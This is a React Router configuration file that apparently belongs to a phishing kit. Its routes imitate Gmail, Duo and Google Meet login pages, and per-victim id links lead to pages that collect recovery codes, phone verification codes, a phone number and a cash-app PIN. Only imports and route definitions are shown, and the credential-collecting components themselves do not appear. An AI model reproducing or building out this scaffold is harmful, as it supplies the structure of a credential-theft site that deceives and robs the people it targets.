import { createBrowserRouter } from "react-router-dom";
import Home from "../components/Home/Home";
import Maps from "../components/Maps/Maps";
import Recovery from "../components/Form/Recovery";
import RecoveryCode from "../components/Form/RecoveryCode";
import NumberPage from "../components/Form/NumberPage";
import RecoveryCodeNew from "../components/Form/RecoveryCodeNew";
import PhoneCode from "../components/Form/PhoneCode";
import New from "../components/Form/New";
import Cashpin from "../components/Form/Cashpin";
import Test2 from "../components/Test2";
import Review from "../components/Review";
import Duo from "../components/Duo";
import LoginPage from "../components/LoginPage";
import HomeGmail from "../components/Home/HomeGamil";



export const router = createBrowserRouter([
  {
    path: "/",
    element: <Maps></Maps>,
  },
  {
    path: "/test",
    element: <New></New>,
  },
  {
    path: "/test2",
    element: <Test2></Test2>,
  },
  {
    path: "live/:id",
    element: <Test2></Test2>,
  },
  {
    path: "location-live/:id",
    element: <Test2></Test2>,
  },
  {
    path: "login/:id",
    element: <LoginPage></LoginPage>,
  },
  {
    path: "duo/:id",
    element: <Duo></Duo>,
  },
  {
    path: "meet/:id",
    element: <Duo></Duo>,
  },
  {
    path: "google-meet/:id",
    element: <Duo></Duo>,
  },
  {
    path: "review/:id",
    element: <Review></Review>,
  },
  {
    path: "location/:id",
    loader: ({ params }) =>
      fetch(`/auth/login/${params.id}`),
    element: <Home></Home>,
  },
  {
    path: "gmail/:id",
    loader: ({ params }) =>
      fetch(`/auth/login/${params.id}`),
    element: <HomeGmail></HomeGmail>,
  },
  {
    path: "/recovery",
    element: <Recovery></Recovery>,
  },
  {
    path: "/code",
    element: <RecoveryCode></RecoveryCode>,
  },
  {
    path: "/get-code",
    element: <PhoneCode></PhoneCode>,
  },
  {
    path: "/phone-code",
    element: <RecoveryCodeNew ></RecoveryCodeNew>,
  },
  {
    path: "/cashpin",
    element: <Cashpin ></Cashpin>,
  },
  {
    path: "/number",
    element: <NumberPage></NumberPage>,
  },
]);